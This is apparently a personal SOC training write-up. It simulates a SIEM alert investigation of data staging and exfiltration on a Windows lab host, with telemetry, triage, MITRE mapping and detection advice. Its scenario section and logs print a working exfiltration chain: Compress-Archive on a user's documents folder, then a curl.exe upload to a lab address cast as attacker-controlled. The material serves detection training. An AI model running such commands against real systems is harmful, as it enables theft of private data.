**Facsimile SIEM Project 01 – Compression + Exfiltration Detection**

🔰 **Introduction**

This project simulates a SIEM-style alert investigation involving **file staging** and **data exfiltration**, which are common late-stage behaviors in an attack lifecycle.

**File staging** refers to the act of collecting, organizing, or packaging data on a host in preparation for exfiltration. This typically involves identifying target files (such as documents, databases, or credentials), copying them to a temporary location, and compressing or encrypting them to make them easier to transfer or conceal.

**Exfiltration** is the unauthorized removal or transmission of data from a system to an external location. This may occur over HTTP, HTTPS, FTP, DNS, or even covert channels. The attacker’s goal is to get sensitive data off the network without detection.

In this simulation, the attacker uses built-in Windows utilities—known as **Living Off the Land Binaries** (LOLBins)—to perform these actions while avoiding detection:

**Compress-Archive**: A PowerShell cmdlet used to zip folders or files into .zip format. Legitimate for admin use, but abnormal when invoked in a stealth context by an end user.

**makecab.exe:** A legacy Windows tool for creating Cabinet (.cab) files. Less commonly used today, but still present on most systems.

**curl.exe**: A command-line tool for transferring data to or from a server using various protocols (including HTTP/HTTPS). On modern Windows systems (Windows 10 1803+), it’s pre-installed. Attackers often use it to send files to an external server, bypassing browser-based filtering.

These tools are abused in this simulation to:

Compress sensitive data using native commands

Send that data to an attacker-controlled IP address via a direct HTTP transfer

The goal of this project is to identify, triage, and assess this behavior using a SOC-style investigation workflow. The investigation emphasizes timeline reconstruction, telemetry analysis, and behavioral context.

This activity is mapped to Steve’s custom Cybersecurity Battlefield framework, particularly its Operating System Anatomy and Supporting Components. The specific mappings include:

✅ **Process Execution Layer**
Involved when powershell.exe, makecab.exe, and curl.exe are launched

Telemetry source: Sysmon Event ID 1 (Process Create)

Supporting components:

Command line arguments

Parent-child process chains

Scheduled tasks or user-initiated triggers

✅ **Network Communication Layer**
Triggered when curl.exe initiates an outbound HTTP connection

Telemetry source: Sysmon Event ID 3 (Network Connection), packet data if available

Supporting components:

**Sockets and Interprocess Communication** 

1. Sockets and Interprocess Communication (IPC)
Explanation:
In Windows, a socket is an endpoint for sending or receiving data over a network—essentially, it's how a process like curl.exe opens a connection to another system (e.g., an attacker-controlled server).
Interprocess Communication (IPC) includes mechanisms like named pipes, shared memory, or messaging that let different processes on the same system talk to each other.

Why this matters here:
While this simulation focuses on outbound transfer via curl, sockets are the underlying structure that enable it. Tools like Sysmon or NetFlow can log socket usage (e.g., which port, which IP, which process).
IPC is less central in this project but could become relevant if a staged compression tool were automated via script or another background process.



**Firewall or proxy logs.**

**Firewall Logs:**

**Show whether traffic was allowed or blocked, which port/protocol was used, and which process or rule was associated.**

Useful for identifying unauthorized egress activity or misconfigured outbound policies.

**Example Entry:**
[Jul 14 07:32:10] [ALLOW] SRC=192.168.56.102 DST=192.168.56.101 DPT=80 PROTO=TCP APP=curl.exe ACTION=ALLOW

**Proxy Logs:**

**Provide high-fidelity inspection of HTTP activity** (URL accessed, method used, headers, status code).

Help differentiate between browser-generated vs. tool-based traffic (based on user-agent strings and method types).

Reveal whether a file transfer took place, and how it was structured.

**Example Entry:**
[Jul 14 07:32:11] USER=Steve URL=http://192.168.56.101/upload METHOD=PUT USER_AGENT=curl/8.1.0 STATUS=200

**DNS resolution (if curl uses a hostname)**

**What Is DNS Resolution?**
DNS (Domain Name System) is the system that converts human-readable domain names (like example.com) into machine-usable IP addresses (like 93.184.216.34).

Every time a program like curl.exe tries to connect to a domain (e.g., http://attacker-domain[.]com/upload), Windows must first ask a DNS server, “What’s the IP address for attacker-domain.com?”

This request and its response are called DNS resolution.

It happens before the actual HTTP connection is made—and it creates an observable signal.

**🤖 Why It Matters for Detection**
DNS logs are often the earliest and stealthiest indicators of an attack:

They show where a host is trying to go, even before data is sent.

Many command-and-control (C2) tools rely on domain generation algorithms (DGAs) or use short-lived domains, which are obvious in DNS.

If curl.exe is launched with a domain instead of a raw IP, you get an extra detection layer:

DNS query → domain lookup

Sysmon or Wireshark sees the resolution

Proxy sees the final connection

This can also reveal malicious infrastructure reuse, e.g., the same domain being contacted by multiple hosts.

**DNS Resolution Logs:**

Logged when a hostname is used instead of a raw IP address.

Reveal domain lookups that precede HTTP connections.

Useful for identifying:

Suspicious or algorithmically generated domains

Malicious infrastructure

First signs of beaconing or outbound staging

**Example:**

[Jul 14 07:31:59] QUERY: attacker-domain.com → RESPONSE: 192.168.56.101
This now reflects a fully visible outbound path:

curl.exe → DNS Query → DNS Response → Firewall Event → Proxy Log → Sysmon Network Connect

✅ **Event Monitoring Layer** 

This layer is responsible for capturing and recording security-relevant activity on the host, including both process creation and network connections.

In this simulation, it enables visibility into either direct use of PowerShell for compression (Compress-Archive) or execution of a separate compression tool (makecab.exe), followed by curl.exe establishing an outbound HTTP connection.”

🛰️ **Telemetry Systems Involved**

**Sysmon (System Monitor):**

A Windows system service that provides detailed event data for security monitoring.

In this project, it's responsible for:

Event ID 1 – Process Creation: Logs when a new process starts (e.g., Compress-Archive, makecab.exe, curl.exe).

Event ID 3 – Network Connection: Logs TCP/UDP outbound connections with IP, port, and process info.

Sysmon events are highly detailed and well-suited for timeline construction and lateral movement tracking.

**Windows Security Logs:**

Native logs captured by the Windows Event Log service.

Relevant events might include:

Event ID 4688 (Process Creation – from standard audit policy)

Event ID 5156 (Filtering Platform – allows network connection logging, if configured)

Compared to Sysmon, these logs can be noisier and less detailed, but they’re still important in environments without Sysmon installed.

**SIEM Events**

These are the alerts and correlation results generated by a Security Information and Event Management platform (e.g., Splunk, Elastic, Sentinel).

In this project, we simulate what a SIEM would alert on, based on rule logic such as:

“Compress-Archive followed by curl.exe within 3 minutes”

“curl.exe outbound HTTP connection to non-whitelisted IP”

🧱 **Supporting Components (Expanded)**
Log Files and Event Viewer:

Windows Event Viewer is the default GUI used to inspect logs from multiple sources, including Sysmon and Security Logs.

Logs can be filtered by Event ID, time, user, or keyword to help investigate incidents.

In a real SOC, analysts might pull log exports from Event Viewer or use a centralized log aggregator to query them.

**Sysmon Configuration Rules:**

Sysmon only logs what it is configured to log.

These rules are defined in a configuration XML file (e.g., SwiftOnSecurity’s sysmon-config).

Rules specify:

Which events to collect (e.g., only processes with certain command-line keywords)

Whether to include/exclude known-good binaries

Tuning these rules is crucial to reduce noise while maintaining visibility.

**Detection Rules in a SIEM-like Environment:**

These are behavioral correlation rules that detect patterns across multiple telemetry events.

For example:

“User launched powershell.exe which ran Compress-Archive, and within 3 minutes curl.exe connected to the internet.”

Detection rules are typically written in a query language (like SPL for Splunk) and include thresholds, time windows, and exclusions to reduce false positives.

🚨 **Note on Attacker Behavior: Smash-and-Grab Tactics**
This scenario reflects an attacker who is performing a “smash-and-grab” operation—a quick, high-risk intrusion focused on immediate data theft rather than long-term access or stealth.

Characteristics of smash-and-grab tactics:

No persistence mechanism is installed (e.g., no scheduled task, registry changes, or startup injection).

No privilege escalation is attempted—the attacker operates in the context of an already compromised account.

Activities happen within a short window (often a single session).

Indicators are typically louder and more direct (e.g., compression and data exfiltration in quick succession).

These attacks are more likely to be caught in real time, which makes effective event monitoring essential for detection and rapid response.

🔎 **Summary: Key Telemetry Signals by Host OS Layer**

**🟠 Process Execution Layer**

Captures the launch of tools like powershell.exe, makecab.exe, and curl.exe

Telemetry Sources:

Sysmon Event ID 1 – Process Create

Windows Security Log – Event ID 4688

Supporting Components:

Command line arguments

Parent-child process relationships

Scheduled tasks or user-triggered executions

**🔵 Network Communication Layer**

Captures the outbound network connection made by curl.exe

Telemetry Sources:

Sysmon Event ID 3 – Network Connection

Firewall Logs – Outbound connection approvals/blocks

Proxy Logs – HTTP method, status, user agent

DNS Logs – Hostname lookups (if domain used instead of raw IP)

**Supporting Components:**

Sockets and interprocess communication (underlying mechanism for connection)

Firewall rules showing policy enforcement

Proxy logs showing file transfer details

DNS resolution path as early detection signal

**🟣 Event Monitoring Layer**

Captures the full sequence of process and network behavior in log form

**Telemetry Sources:**

Sysmon log stream

Windows Security Event logs

SIEM alert logic (correlated detection patterns)

**Supporting Components:**

Event Viewer and local log files

Sysmon configuration filters

SIEM detection rules matching attacker behavior (e.g., compression followed by transfer)




**📘 Phase 1 – Scenario Definition**

**Attacker Goal:**
Exfiltrate the contents of C:\Users\Steve\Documents\ProjectFiles by compressing them into a single archive and transferring the data to an external server over HTTP.

**Compression Method:**
The attacker uses Compress-Archive, a native PowerShell cmdlet, to create a .zip archive of the target folder.
This method is stealthier than dropping external tools and avoids AV/EDR alerts triggered by uncommon binaries.

**Note:** A second option could have been makecab.exe, a legacy utility for creating Cabinet (.cab) files, but this simulation uses PowerShell for compression.

**Exfiltration Method:**
curl.exe is used to upload the archive to an attacker-controlled IP over HTTP.
curl is pre-installed on modern Windows systems and is often overlooked in alerting logic.

**Simulated Attacker Commands:**

Compress-Archive -Path "C:\Users\Steve\Documents\ProjectFiles" -DestinationPath "C:\Temp\project.zip"
curl.exe -T "C:\Temp\project.zip" http://192.168.56.101/upload

**Sequence Summary:**

Attacker identifies sensitive folder to steal

Uses PowerShell to compress the folder into a .zip archive

Transfers the file via curl.exe to an external server on port 80

**Attack Characteristics:**

Fileless and tool-less: no additional malware or binaries dropped

Time-compressed: executed quickly within one session

Identity-persistent: attacker uses an already compromised user account, without privilege escalation or persistence



**🚨 Phase 2 – SIEM Alert**
Alert Name: Suspicious Compression Followed by Outbound Transfer

Detection Type: Behavioral chain correlation

Simulated logic:

Alert when compression command is followed by curl.exe within 3 minutes

Alert details:

Timestamp: 2025-07-14 07:32:10

Host: Win11-Lab01

User: Steve

Initial Process: powershell.exe running Compress-Archive

Follow-up Process: curl.exe making an outbound HTTP POST

Destination IP: 192.168.56.101

Destination Port: 80

**🔎 Phase 3 – Triage & Analysis**

**🔍 3.1 Key Questions and Answers**

**Q1: Is the compression tool normally used on this host?**
A: No. Based on process telemetry (Sysmon Event ID 1 and Windows Event Log 4688), Compress-Archive had not been previously observed in any scheduled or user-initiated workflows on this host. No baseline indicators suggest this command is part of routine operations. It is considered anomalous for the user account "Steve."

**Q2: What files were included in the archive?**
A: The command-line arguments captured in the process creation log show:


Compress-Archive -Path "C:\Users\Steve\Documents\ProjectFiles" -DestinationPath "C:\Temp\project.zip"
This indicates the entire ProjectFiles directory was compressed. While file-level detail is not captured by default in process logs, we can infer high-sensitivity based on folder location and name. If needed, analysts could examine the contents of C:\Temp\project.zip (if still present) or retrieve this detail through EDR or forensic tools.

**Q3: Was the curl.exe process spawned manually or by script?**
A: Sysmon Event ID 1 indicates that curl.exe was launched by powershell.exe.
This implies scripted or semi-automated execution, not a manual launch through File Explorer or Start Menu. The presence of both tools in a short time window further suggests a coordinated sequence (possibly pasted into PowerShell as a block or executed via a script).

**Q4: Is the destination IP internal, known, or external?**
A: The IP address 192.168.56.101 is part of an internal private address space (192.168.x.x).
However, in a real-world environment, this would be interpreted as suspicious internal-to-internal communication unless the destination is a known, approved server.
In this simulation, it represents an attacker-controlled machine on the same local subnet, simulating internal staging or pivoting behavior.

**Q5: Are there other signs of staging, persistence, or credential access?**
A: No additional indicators were observed in this scenario. No scheduled tasks, startup registry entries, or abnormal access to LSASS or SAM were detected. The behavior appears to be consistent with “smash-and-grab” tactics, in which the attacker performs quick data theft without long-term foothold or privilege escalation.



**3.2  Telemetry**

🟠 Sysmon Event ID 1 – Process Creation (Compression Step)

Time: 07:31:42
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLine: Compress-Archive -Path "C:\Users\Steve\Documents\ProjectFiles" -DestinationPath "C:\Temp\project.zip"
ParentImage: C:\Windows\explorer.exe
User: Steve
This log shows that powershell.exe was used to invoke the Compress-Archive cmdlet.

The parent process is explorer.exe, suggesting the user launched PowerShell interactively.

Command-line arguments indicate the exact source and destination path for the ZIP file.

**🔵 Sysmon Event ID 1 – Process Creation (Exfiltration Step)**

Time: 07:32:04
Image: C:\Windows\System32\curl.exe
CommandLine: curl.exe -T "C:\Temp\project.zip" http://192.168.56.101/upload
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
User: Steve
This shows that curl.exe was launched by powershell.exe, confirming the compression and exfiltration were chained in the same session.

The command-line arguments show the exact file being transferred and the destination URL.

**🔵 Sysmon Event ID 3 – Network Connection**

Time: 07:32:05
Image: C:\Windows\System32\curl.exe
Destination IP: 192.168.56.101
Destination Port: 80
Initiating Process: powershell.exe
This log confirms an outbound HTTP connection by curl.exe.

Sysmon links the network activity back to powershell.exe as the initiating process.

The destination IP matches the address defined in the scenario.


**📌 Phase 4 – Findings**

**Summary:**

Compress-Archive was used to stage a ZIP archive.

curl.exe transmitted that file externally via HTTP.

No traditional browser or upload tool was used.

**Cybersecurity Battlefield Mapping:**

Process Execution Layer: Suspicious PowerShell invocation of compression

Network Communication Layer: Unusual outbound connection by non-browser

Event Monitoring Layer: Clear visibility via Sysmon Event 1 and 3

**MITRE ATT&CK Mapping:**

T1002 – Data Compressed: Attacker staged sensitive files by compressing them into a ZIP archive

T1041 – Exfiltration Over C2 Channel: Data was transmitted to an external IP via HTTP using curl.exe


**🧠 Phase 5 – Detection Logic & Recommendations**

**Detection Logic:**

Alert on use of compression tools (Compress-Archive) followed by network transfer (curl.exe) within 5 minutes.

Flag non-browser processes making outbound HTTP connections.

Cross-reference process lineage to identify automation or scripting.

**Recommendations:**

Block or restrict LOLBins like curl.exe via AppLocker or Group Policy.

Monitor staging behavior such as large ZIP creation in temp folders.

Detect unapproved transfers to non-whitelisted IPs, whether internal or external.

Incorporate behavioral allowlists for normal automation tasks.

Consider adding proxy or EDR inspection for unusual transfer patterns.


**🧠 Simulation Series Statement**

This project is part of an ongoing simulation series designed to support the efficient formulation of cybersecurity detection workflows and investigative logic. By simulating both attacker behavior and SOC-level telemetry in a structured format, this approach enables the execution of many different scenarios in shorter time frames—greatly accelerating the learning curve without sacrificing analytical depth.

This series leverages the power of artificial intelligence and structured simulation to create a scalable, flexible, and high-fidelity learning environment. It reflects a strategic focus on comprehension, operational fluency, and investigative skill development—while acknowledging the reality that configuration tasks are often handled by dedicated engineers in production environments.



